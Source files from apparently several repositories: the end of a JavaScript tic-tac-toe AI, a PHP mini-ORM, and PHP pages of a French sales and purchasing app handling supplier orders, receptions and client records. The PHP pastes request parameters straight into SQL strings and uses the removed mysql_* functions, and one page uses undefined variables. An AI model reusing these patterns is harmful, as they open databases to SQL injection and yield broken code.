//console.log(`checkTurn[${level},${player},${i}]`);
let ranks = [];
ranks.push(0);
if (ft.is_middle_side) {
//1 : Empty side: The player plays in a middle square on any of the 4 sides.
//optimal_move = i;
ranks.push(1);
}
if (ft.is_corner(i)) {
//Empty corner: The player plays in a corner square.
//optimal_move = i;
ranks.push(2);
}
if (ft.is_corner(i) &&
move_map[ft.opposite_corner(i)] === ft.opponent(player)) {
//3 : Opposite corner: If the opponent is in the corner,
//the player plays the opposite corner.
//optimal_move = i;
ranks.push(3);
}
if (i===4) {
//Center: A player marks the center. (If it is the first move of the game,
//playing on a corner gives "O" more opportunities to make a mistake
//and may therefore be the better choice;
//however, it makes no difference between perfect players.)
//optimal_move = i;
ranks.push(4);
}
let opponent_moves = ft.analyseMove(i, move_map, ft.opponent(player));
if (opponent_moves.pairs > 1) {
//5 : Blocking, Option 2: If there is a configuration where the opponent can fork,
//the player should block that fork.
//optimal_move = i;
ranks.push(5);
}
let my_moves = ft.analyseMove(i, move_map, player );
if (opponent_moves.pairs > 1) {
//7 : Blocking an opponent's fork
//optimal_move = i;
ranks.push(6);
}
if (my_moves.pairs > 0) {
//6 : Blocking, Option 1: The player should create two in a row to force the opponent into defending,
//as long as it doesn't result in them creating a fork. For example, if "X" has a corner,
//"O" has the center, and "X" has the opposite corner as well,
//"O" must not play a corner in order to win.
//(Playing a corner in this scenario creates a fork for "X" to win.)
let tmp_res=[];
if (level === 0) {
let tmp_map = move_map.slice();
tmp_map[i] = player; //simulate turn
tmp_res = ft.findTurn(ft.opponent(player), tmp_map, 1);
let ranks_temp = tmp_res[1];
if (ranks_temp.indexOf(8) === -1) {
//optimal_move = i;
ranks.push(7);
}
}
}
if (my_moves.pairs > 1) {
//8 : Fork: Create an opportunity where the player has two threats to win (two non-blocked lines of 2).
//optimal_move = i;
ranks.push(8);
}
if (opponent_moves.trinities > 0) {
//9 : Block: If the opponent has two in a row, the player must play the third themselves to block the opponent.
//optimal_move = i;
ranks.push(9);
}
if (my_moves.trinities > 0) {
//10 : Win: If the player has two in a row, they can place a third to get three in a row.
//optimal_move = i;
ranks.push(10);
}
if (ft.compareRanks(best_ranks, ranks) === 2) {
optimal_move=i;
best_ranks = ranks.slice(0);
}
//console.log(`checkTurn end [${level},${player},${i}]=${optimal_move} ranks=${ranks} best_ranks=${best_ranks}`);
}
}
//console.log(`findTurn end [${level},${player}]=${optimal_move} best_ranks=${best_ranks}`);
return [optimal_move, best_ranks];
},
player_pos: function(pos, move_map, player) {
return pos && move_map[pos.index] === player;
},
free_pos: function(pos, move_map) {
return pos && !move_map[pos.index];
},
analyseMove: function(move, move_map, player) {
let p=ft.Position(move);
return all_dirs.reduce(function(res, dir) {
//analyse all directions
let p1 = p.mv(dir);
let p2 = null;
if (p1) p2 = p1.mv(dir);
let p_opos = p.mv(ft.opos_dir(dir));
if (ft.player_pos(p1, move_map, player) && ft.player_pos(p2, move_map, player))
res.trinities++;
if (ft.player_pos(p1, move_map, player) && ft.player_pos(p_opos, move_map, player))
res.trinities++;
else if (ft.player_pos(p_opos, move_map, player) && ft.free_pos(p1, move_map))
res.pairs++;
else if (ft.player_pos(p1, move_map, player) && ft.free_pos(p2, move_map))
res.pairs++;
else if (ft.player_pos(p2, move_map, player) && ft.free_pos(p1, move_map))
res.pairs++;
return res;
}, {
pairs: 0,
trinities: 0
});
}
};
module.exports = ft;
|
92c55385be0cf132be131e7ba46baaa77ca4db11
|
[
"Markdown",
"JavaScript"
] | 3
|
Markdown
|
szomolanyi/TicTacToe
|
8073ba8ced4a46f2c3707af085a60e37289676ac
|
9d3b5955e38666938e047a11fbef202557ee549b
|
refs/heads/master
|
<file_sep><?php
class L{
// Переменная для подключения к бд
static private $connection;
static private $arr;
static private $freeze = false;
static private function describe($table){
$q = mysqli_query(self::$connection,"DESCRIBE `$table`");
$qu = mysqli_query(self::$connection,"SELECT COUNT(1) FROM `$table`");
$count = mysqli_fetch_array($qu);
self::$arr = [];
for($i = 0;$i < 250;$i++){
self::$arr[$i] = mysqli_fetch_array($q);
}
foreach (self::$arr as $key => $value) {
if(trim(gettype($value)) != 'array'){
unset(self::$arr[$key]);
}
}
}
public function tables(){
$q = mysqli_query(self::$connection, "SHOW TABLES");
$quer = mysqli_fetch_array($q);
$arr = [];
$i = 0;
while($i < 250){
$i++;
$arr[$i] = mysqli_fetch_array($q);
}
foreach ($arr as $key => $value) {
if(trim(gettype($value)) != 'array'){
unset($arr[$key]);
}
}
return $arr;
}
public function showStruct($table){
self::describe($table);
return self::$arr;
}
public function sql($command){
mysqli_query(self::$connection, $command);
}
public function freeze(){
self::$freeze = true;
}
public function unfreeze(){
self::$freeze = false;
}
// Подключаемся к БД
public function setup($host,$dbname,$login,$pass){
self::$connection = mysqli_connect($host,$login,$pass,$dbname);
}
// Ишем в таблице по условию ($condition)
public function read($table,$condition){
$result = mysqli_query(self::$connection,"SELECT * FROM `$table` WHERE $condition ");
return mysqli_fetch_array($result);
}
// Удаляем по условию
public function del($table,$condition){
$del = "DELETE FROM `$table` WHERE $condition";
$result = mysqli_query(self::$connection,$del);
}
// Очищаем таблицу полностью
public function clear($table){
$clr = "TRUNCATE TABLE `$table`";
$result = mysqli_query(self::$connection,$clr);
}
// Выводит все данные из таблицы в виде двумерного массива
public function readAll($table,$limit = false){
$arr = array();
$q = mysqli_query(self::$connection,"SELECT COUNT(1) FROM `$table`");
$count = mysqli_fetch_array($q);
for($i = 1;$i < $count[0] + 1;$i++){
$result = mysqli_query(self::$connection,"SELECT * FROM `$table` WHERE id = $i");
$arr['id-'.$i] = mysqli_fetch_array($result);
}
return $arr;
}
// Создаёт массив с которым будет работать update
public function load($table,$id){
$variable = array('table' => $table,'id' => (int)$id);
return $variable;
}
// Обновляет записи в бд по id
public function update($variable){
$update = "
UPDATE
`".$variable['table']."`
SET
";
foreach ($variable as $key => $value) {
if(trim($key) != 'table' && trim($key) != 'id'){
if(trim(gettype($value)) == 'string'){
$update = $update.'`'.$key.'` = \''.$value.'\',';
}else{
$update = $update.'`'.$key.'` = '.$value.',';
}
}
}
$update = substr($update,0,-1);
$update = $update."
WHERE
id = ".$variable['id']."";
$q = mysqli_query(self::$connection,$update);
}
// Создаёт массив для store
public function dispense($table){
$arr = array('table' => $table);
return $arr;
}
// Создаёт таблицу если её нет, Закидывает записи в таблицу
public function store($variable){
if(self::$freeze == false){
self::describe($variable['table']);
$arr = [];
$arr2 = [];
$arr3 = [];
foreach($variable as $key => $value){
if(trim($key) != 'table'){
$arr[$key] = $value;
}
}
foreach (self::$arr as $key => $value) {
if(trim(gettype($value)) == 'array'){
foreach (self::$arr[$key] as $key => $value) {
if($key == 'Field'){
array_push($arr2,$value);
}
}
}
}
foreach ($arr as $key => $value) {
if(in_array($key, $arr2)){
}else{
$arr3[$key] = $value;
};
}
foreach ($arr3 as $key => $value) {
if(trim($key) != 'table'){
if(trim(gettype($value)) == 'string'){
$q = mysqli_query(self::$connection,"ALTER TABLE `".$variable['table']."` ADD `".$key."` TEXT(65535) AFTER `".array_pop($arr2)."`");
}
if(gettype($value) == 'integer'){
$q = mysqli_query(self::$connection,"ALTER TABLE `".$variable['table']."` ADD `".$key."` INT(128) AFTER `".array_pop($arr2)."`");
}
if(gettype($value) == 'double'||gettype($value) == 'float'){
$q = mysqli_query(self::$connection,"ALTER TABLE `".$variable['table']."` ADD `".$key."` FLOAT(53) AFTER `".array_pop($arr2)."`");
};
}
}
}else{
self::describe($variable['table']);
$arr = [];
$arr2 = [];
$arr3 = [];
foreach($variable as $key => $value){
if(trim($key) != 'table'){
$arr[$key] = $value;
}
}
foreach (self::$arr as $key => $value) {
if(trim(gettype($value)) == 'array'){
foreach (self::$arr[$key] as $key => $value) {
if($key == 'Field'){
array_push($arr2,$value);
}
}
}
}
foreach ($arr as $key => $value) {
if(in_array($key, $arr2)){
}else{
$arr3[$key] = $value;
};
}
}
$insert = "INSERT INTO `".$variable['table']."`(";
foreach ($variable as $key => $value) {
if(trim($key) != 'table'){
if(!array_key_exists($key,$arr3)){
$insert = $insert.''.$key.',';
}
}
}
$insert = substr($insert,0,-1);
$insert = $insert.") VALUES(";
foreach ($variable as $key => $value) {
if(trim($key) != 'table'){
if(!array_key_exists($key,$arr3)){
if(trim(gettype($value)) == 'string'){
$insert = $insert.'\''.$value.'\',';
}else{
$insert = $insert.''.$value.',';
}
}
}
}
$insert = substr($insert,0,-1);
$insert = $insert.')';
foreach ($variable as $key => $value) {
if(trim($key) != 'table'){
if(trim(gettype($value)) == 'string'&&strlen($value) < 512){
$variable[$key] = $key.' TEXT(512),
';
}elseif(trim(gettype($value)) == 'string'&&strlen($value) > 512&&strlen($value) <= 1024){
$variable[$key] = $key.' TEXT(1024),
';
}elseif(trim(gettype($value)) == 'string'&&strlen($value) > 1024&&strlen($value) <= 2048){
$variable[$key] = $key.' TEXT(2048),
';
}elseif(trim(gettype($value)) == 'string'&&strlen($value) > 2048&&strlen($value) <= 4096){
$variable[$key] = $key.' TEXT(4096),
';
}elseif(trim(gettype($value)) == 'string'&&strlen($value) > 4096){
$variable[$key] = $key.' TEXT(65535),
';
}
if(gettype($value) == 'integer'){
$variable[$key] = $key.' INT(128),
';
}
if(gettype($value) == 'double'||gettype($value) == 'float'){
$variable[$key] = $key.' FLOAT(53),
';
}
}
};
$query = "
CREATE TABLE ".$variable['table']."(
id INT(20) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
";
foreach ($variable as $key => $value) {
if(trim($key) != 'table'){
$query = $query.''.$value;
}
};
$query = substr($query,0,-3);
$query = $query.'
)';
$q = mysqli_query(self::$connection,$query);
$q = mysqli_query(self::$connection,$insert);
}
public function close(){
mysqli_close(self::$connection);
}
}
?>
|
bfb737bf5d4ec26daa28404d576a60af15e8420b
|
[
"PHP"
] | 1
|
PHP
|
PeGrina/Lyricon-ORM
|
7d757ba5883158b79c6c71bb8e4bedb899be3dc8
|
226620336f3bbae43d3470b21044d48c8f57df91
|
refs/heads/main
|
<file_sep>import requests
import json
from matplotlib import pyplot as plt
url = "https://apidojo-yahoo-finance-v1.p.rapidapi.com/market/v2/get-quotes"
querystring = {"region":"US","symbols":"AMD,IBM,AAPL,NKE,TSLA,FB,AMZN,NFLX"}
headers = {
'x-rapidapi-key': "<KEY>",
'x-rapidapi-host': "apidojo-yahoo-finance-v1.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers, params=querystring)
data = response.json()
tickerAndPriceToBook = {}
for company in data['quoteResponse']['result']:
symbol = company['symbol']
priceToBook = company['priceToBook']
tickerAndPriceToBook[symbol] = priceToBook
sortedDict = sorted(tickerAndPriceToBook.items(), key=lambda item: item[1])
xvals = []
yvals = []
for obj in sortedDict:
xvals.append(obj[0])
yvals.append(obj[1])
fig, ax = plt.subplots()
ax.set(xlabel='Ticker', ylabel = 'Price-To-Book Value')
ax.title('Sorted Plot-To-Book Values of Public Companies')
ax.scatter(xvals,yvals)
plt.show()<file_sep><h1 align='center'>finance-matplotlib-python</h1>
****
## 🌎 Overview
This application graphs the Price-To-Book value of several publicly traded companies.
The data is sorted in order and displayed as a scatter plot.
## 👍 How To Run
The app can be run locally for testing and further development.
```bash
# clone the repo and cd into it
git clone https://github.com/spencerkrebs/CoronaVirusTrackerJava.git
cd CoronaVirusTrackerJava
# install python's requests HTTP library
pip3 install requests
# install matplotlib
python3 -m ensurepip --default-pip
python -m pip install -U matplotlib
```
## 📦 Tech Stack
* Python
* Matplotlib
* Yahoo Finance API
|
ff6fada3e162a40c36dc51afe34b52bc824ecc7f
|
[
"Markdown",
"Python"
] | 2
|
Python
|
spencerkrebs/finance-matplotlib-python
|
3f9f920578eddc2e68f397adee9290a59876a447
|
be3503aa5304609b7034999dc84e49e73b413476
|
refs/heads/master
|
<file_sep>GCO
===
Gestion Commerciale Online
<file_sep><?php
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$idcmdfour = $_GET['idcmdfour'];
//Import des élément de devis
$sql_cmd_four = mysql_query("SELECT * FROM `cmd_four` WHERE idcmdfour =".$idcmdfour);
$donnee_cmd_four = mysql_fetch_array($sql_cmd_four);
$idreceptionfour = $donnee_cmd_four['idcmdfour'];
$idcmdfour = $donnee_cmd_four['idcmdfour'];
$idfournisseur = $donnee_cmd_four['idfournisseur'];
$date_reception_four = date("d-m-Y");
$art1 = $donnee_cmd_four['art1'];
$art2 = $donnee_cmd_four['art2'];
$art3 = $donnee_cmd_four['art3'];
$art4 = $donnee_cmd_four['art4'];
$art5 = $donnee_cmd_four['art5'];
$art6 = $donnee_cmd_four['art6'];
$art7 = $donnee_cmd_four['art7'];
$art8 = $donnee_cmd_four['art8'];
$art9 = $donnee_cmd_four['art9'];
$art10 = $donnee_cmd_four['art10'];
$art11 = $donnee_cmd_four['art11'];
$art12 = $donnee_cmd_four['art12'];
$qte1 = $donnee_cmd_four['qte1'];
$qte2 = $donnee_cmd_four['qte2'];
$qte3 = $donnee_cmd_four['qte3'];
$qte4 = $donnee_cmd_four['qte4'];
$qte5 = $donnee_cmd_four['qte5'];
$qte6 = $donnee_cmd_four['qte6'];
$qte7 = $donnee_cmd_four['qte7'];
$qte8 = $donnee_cmd_four['qte8'];
$qte9 = $donnee_cmd_four['qte9'];
$qte10 = $donnee_cmd_four['qte10'];
$qte11 = $donnee_cmd_four['qte11'];
$qte12 = $donnee_cmd_four['qte12'];
$sql_reception_four = "INSERT INTO `reception_four`(`idreceptionfour`, `idcmdfour`, `idfournisseur`, `date_reception_four`, `etat_reception_four`, `art1`, `qte1`, `art2`, `qte2`, `art3`, `qte3`, `art4`, `qte4`, `art5`, `qte5`, `art6`, `qte6`, `art7`, `qte7`, `art8`, `qte8`, `art9`, `qte9`, `art10`, `qte10`, `art11`, `qte11`, `art12`, `qte12`)
VALUES ('','$idcmdfour','$idfournisseur','$date_reception_four','1','$art1','$qte1','$art2','$qte2','$art3','$qte3','$art4','$qte4','$art5','$qte5','$art6','$qte6','$art7','$qte7',
'$art8','$qte8','$art9','$qte9','$art10','$qte10','$art11','$qte11','$art12','$qte12')";
$sql_article_stock1 = "UPDATE `article` SET `stock_reel`=$qte1 WHERE desc_court ='$art1'";
$sql_article_stock2 = "UPDATE `article` SET `stock_reel`=$qte2 WHERE desc_court ='$art2'";
$sql_article_stock3 = "UPDATE `article` SET `stock_reel`=$qte3 WHERE desc_court ='$art3'";
$sql_article_stock4 = "UPDATE `article` SET `stock_reel`=$qte4 WHERE desc_court ='$art4'";
$sql_article_stock5 = "UPDATE `article` SET `stock_reel`=$qte5 WHERE desc_court ='$art5'";
$sql_article_stock6 = "UPDATE `article` SET `stock_reel`=$qte6 WHERE desc_court ='$art6'";
$sql_article_stock7 = "UPDATE `article` SET `stock_reel`=$qte7 WHERE desc_court ='$art7'";
$sql_article_stock8 = "UPDATE `article` SET `stock_reel`=$qte8 WHERE desc_court ='$art8'";
$sql_article_stock9 = "UPDATE `article` SET `stock_reel`=$qte9 WHERE desc_court ='$art9'";
$sql_article_stock10 = "UPDATE `article` SET `stock_reel`=$qte10 WHERE desc_court ='$art10'";
$sql_article_stock11 = "UPDATE `article` SET `stock_reel`=$qte11 WHERE desc_court ='$art11'";
$sql_article_stock12 = "UPDATE `article` SET `stock_reel`=$qte12 WHERE desc_court ='$art12'";
mysql_query($sql_reception_four);
mysql_query($sql_article_stock1);
mysql_query($sql_article_stock2);
mysql_query($sql_article_stock3);
mysql_query($sql_article_stock4);
mysql_query($sql_article_stock5);
mysql_query($sql_article_stock6);
mysql_query($sql_article_stock7);
mysql_query($sql_article_stock8);
mysql_query($sql_article_stock9);
mysql_query($sql_article_stock10);
mysql_query($sql_article_stock11);
mysql_query($sql_article_stock12);
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php">COMMANDE</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Transfere en Reception</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Transfere en Reception</span></h3>
</div>
<?php
if($sql_reception_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le Bon de récéption Numéro RECFOUR000<?php echo $idcmdfour; ?> à été transférer avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($sql_reception_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produit. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
//Import des élément de devis
$sql_article_export = mysql_query("SELECT * FROM `article` ");
$donnee_article_export = mysql_fetch_array($sql_article_export);
$id_product = $donnee_article_export['idarticle'];
$id_category_default = $donnee_article_export['idfamillearticle'];
$quantity = $donnee_article_export['stock_reel'];
$sql_cmd_four = "INSERT INTO `cmd_four`(`idcmdfour`, `idfournisseur`, `date_cmd_four`, `etat_cmd_four`, `date_livraison_cmd_four`, `art1`, `qte1`, `art2`, `qte2`, `art3`, `qte3`, `art4`, `qte4`, `art5`, `qte5`, `art6`, `qte6`, `art7`, `qte7`, `art8`, `qte8`, `art9`, `qte9`, `art10`, `qte10`, `art11`, `qte11`, `art12`, `qte12`, `pvht1`, `pvht2`, `pvht3`, `pvht4`, `pvht5`, `pvht6`, `pvht7`, `pvht8`, `pvht9`, `pvht10`, `pvht11`, `pvht12`, `port`, `remise`, `eco-part`, `ptht_cmd_four`, `taxe_cmd_four`, `ptttc_cmd_four`)
VALUES ('','$idfournisseur','$date_cmd_four','1','','$art1','$qte1','$art2','$qte2','$art3','$qte3','$art4','$qte4','$art5','$qte5','$art6','$qte6','$art7','$qte7',
'$art8','$qte8','$art9','$qte9','$art10','$qte10','$art11','$qte11','$art12','$qte12','$pvht1','$pvht2','$pvht3','$pvht4','$pvht5','$pvht6','$pvht7','$pvht8','$pvht9','$pvht10','$pvht11',
'$pvht12','$port','$remise','$eco_part','$ptht_cmd_four','$taxe_cmd_four','$ptttc_cmd_four')";
mysql_query($sql_cmd_four);
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php">DEVIS</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Transfere en Commande</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Transfere en commande</span></h3>
</div>
<?php
if($sql_cmd_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le Commande Numéro CMDFOUR000<?php echo $iddevisfour; ?> à été transférer avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($sql_cmd_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produit. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idclient = $_GET['idclient'];
$sql_client = mysql_query("SELECT * FROM client WHERE idclient =".$idclient);
$donnee_client = mysql_fetch_array($sql_client);
?>
<script type="text/javascript">
$("#date").mask("99/99/9999");
</script>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php">Client</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Modifier Client</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>CLIENT - <span class="semi-bold">Modifier Client</span></h3>
</div>
<div class="row">
<div class="col-md-12">
<div class="grid simple transparent">
<div class="grid-title">
<h4>Modifier <span class="semi-bold">Client</span></h4>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<div class="row">
<form id="commentForm" action="valid.modif.client.php" method="post">
<div id="rootwizard" class="col-md-12">
<div class="form-wizard-steps">
<ul class="wizard-steps">
<li class="" data-target="#step1"> <a href="#tab1" data-toggle="tab"> <span class="step">1</span> <span class="title">Information de Contact</span> </a> </li>
<li data-target="#step2" class=""> <a href="#tab2" data-toggle="tab"> <span class="step">2</span> <span class="title">Information Société</span> </a> </li>
<li data-target="#step3" class=""> <a href="#tab3" data-toggle="tab"> <span class="step">3</span> <span class="title">Information de Paiement</span> </a> </li>
</ul>
<div class="clearfix"></div>
</div>
<div class="tab-content transparent">
<div class="tab-pane" id="tab1"> <br>
<h4 class="semi-bold">Etape 1 - <span class="light">Information de Contact</span></h4>
<br>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="<?php echo $donnee_client['idclient']; ?>" class="form-control no-boarder " name="idclient" id="txtFirstName" value= "<?php echo $donnee_client['idclient']; ?>" hidden>
</div>
<div class="col-md-12">
<select name="civilite" class="form-control no-boarder " placeholder="Civilité" value=="<?php echo $donnee_client['civilite']; ?>">
<option value="1">Monsieur</option>
<option value="2">Madame</option>
<option value="3">Mademoiselle</option>
<option value="4">Entreprise</option>
<option value="5">SARL</option>
<option value="6">SA</option>
<option value="7">EURL</option>
<option value="8">SAS</option>
</select>
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<input type="text" placeholder="Nom" class="form-control no-boarder " name="nom" id="txtFirstName" value = "<?php echo $donnee_client['nom']; ?>">
</div>
<div class="col-md-6">
<input type="text" placeholder="Prénom" class="form-control no-boarder " name="prenom" id="txtLastName" value = "<?php echo $donnee_client['prenom']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<textarea name="adresse1" class="form-control no-boarder " placeholder="Adresse du client"><?php echo $donnee_client['adresse1']; ?></textarea>
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<textarea name="adresse2" class="form-control no-boarder " placeholder="Complément d'Adresse du client"><?php echo $donnee_client['adresse2']; ?></textarea>
</div>
</div>
<div class="row form-row">
<div class="col-md-2">
<input type="text" placeholder="Code Postal" class="form-control no-boarder " name="cp" id="txtLastName" value="<?php echo $donnee_client['cp']; ?>">
</div>
<div class="col-md-10">
<input type="text" placeholder="Ville" class="form-control no-boarder " name="ville" id="txtLastName" value="<?php echo $donnee_client['ville']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-4">
<input type="text" placeholder="Tel Fixe" class="form-control no-boarder " name="tel" id="txtLastName" value="<?php echo $donnee_client['tel']; ?>">
</div>
<div class="col-md-4">
<input type="text" placeholder="Fax" class="form-control no-boarder " name="fax" id="txtLastName" value="<?php echo $donnee_client['fax']; ?>">
</div>
<div class="col-md-4">
<input type="text" placeholder="Tel Portable" class="form-control no-boarder " name="port" id="txtLastName" value="<?php echo $donnee_client['port']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="Adresse Mail" class="form-control no-boarder " name="mail" id="txtLastName" value="<?php echo $donnee_client['mail']; ?>">
</div>
</div>
<div class="row form-row">
<label>Responsable client</label>
<div class="col-md-12">
<select name="iduser" class="form-control no-boarder " >
<option value="1" <?php if ($donnee_client['iduser']=='1'){ echo "selected";} ?>>Corentin</option>
<option value="2" <?php if ($donnee_client['iduser']=='2'){ echo "selected";} ?>>Maxime</option>
<option value="3" <?php if ($donnee_client['iduser']=='3'){ echo "selected";} ?>>Alexis</option>
<option value="4" <?php if ($donnee_client['iduser']=='4'){ echo "selected";} ?>>Ludivine</option>
</select>
</div>
</div>
</div>
<div class="tab-pane" id="tab2"> <br>
<h4 class="semi-bold">Etape 2 - <span class="light">Information Société</span></h4>
<br>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="Raison Social" class="form-control no-boarder " name="raison_social" id="txtCountry" value="<?php echo $donnee_client['raison_social']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="Numéro de Siret" class="form-control no-boarder " name="num_siret" id="txtCountry" value="<?php echo $donnee_client['num_siret']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
